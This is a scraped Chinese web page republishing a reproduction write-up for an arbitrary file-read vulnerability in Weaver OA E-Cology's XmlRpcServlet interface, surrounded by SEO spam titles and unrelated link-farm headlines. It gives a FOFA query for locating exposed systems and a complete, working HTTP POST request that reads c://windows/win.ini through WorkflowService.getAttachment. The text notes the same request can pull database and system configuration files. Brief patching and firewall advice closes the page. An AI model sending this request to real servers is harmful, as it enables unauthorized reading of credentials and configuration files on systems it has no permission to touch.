当前位置: 首页 > news >正文

发布网站免费空间做医美设计的网站

发布网站免费空间,做医美设计的网站,送网站建设管理信息内容审核制度,沈阳市住房和城乡建设局网站首页漏洞介绍 泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台XmRpcServlet接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件 (如数据库配置…

漏洞介绍

泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台XmRpcServlet接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件 (如数据库配置文件、系统配置文件) 、数据库配置文件等等,导致网站处于极度不安全状态。

FOFA

app=“泛微-OA(e-cology)”

漏洞复现

读取win.ini文件

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/xml
Accept-Encoding: gzip
Content-Length: 218
Connection: keep-alive<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params>
<param>
<value><string>c://windows/win.ini</string></value>
</param>
</params>
</methodCall>

在这里插入图片描述
对返回的密文进行解码
在这里插入图片描述

修复建议

官方已修复该漏洞,请用户联系商修复漏洞: https://www.weaver.com.cn/cs/securityDownload.htm
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统.

http://www.yayakq.cn/news/365683/

相关文章:

  • 简单网站建设官网福州做网站哪家最好
  • 网站建设宣传文案腾讯邮箱注册入口官网
  • 广告制作主要做什么seo软件工具
  • 做亚马逊有看数据的网站吗广州网站建设50强名单
  • 建筑工程网站大全seo整站优化公司持续监控
  • 家庭宽带做网站服务器设计师找图网站
  • 临湘做网站网络公司企业文化标语
  • wordpress调用二级分类目录菏泽资深seo报价
  • 东莞网站建设优化网站改版的seo注意事项
  • 百度地图 添加到网站公司做网站的费用怎么做账
  • 网站美工色彩搭配公众号开发成购买产品的平台
  • 微信公众号链接的网站怎么做的django网站开发源代码
  • 泉州百度网站推广2015微信网站开发
  • 大连网站制作团队做销售的什么网站好
  • 义乌网站建设托管微信推广联盟
  • 怎么利用个人网站iapp网站做软件
  • 南宁公司网站建设公司企业团队建设案例公司
  • 网站模板下载百度云链接怎么做的做卡贴的网站
  • 手机网站建设yu学动漫设计去哪个学校
  • 如何查看一个网站是用什么程序做的ps免费模板网站
  • 石家庄自助建站模板公司企业网站模板下载
  • pc网站开发微信支付做网站赤峰
  • 青梦建站百度在线问答
  • 网站关键字语法东莞商场
  • 网站建设营销开场白成都轨迹公布
  • 玉林网站开发app页面模板
  • 网站建设与制作这个行业怎么样呢企信网证书寄来要钱的吗
  • 替别人做网站现在帮别人做网站赚钱不
  • 网站投放广告赚钱吗哪个网站可以做微信引导图
  • 网站不能上传附件免费建站网站哪个好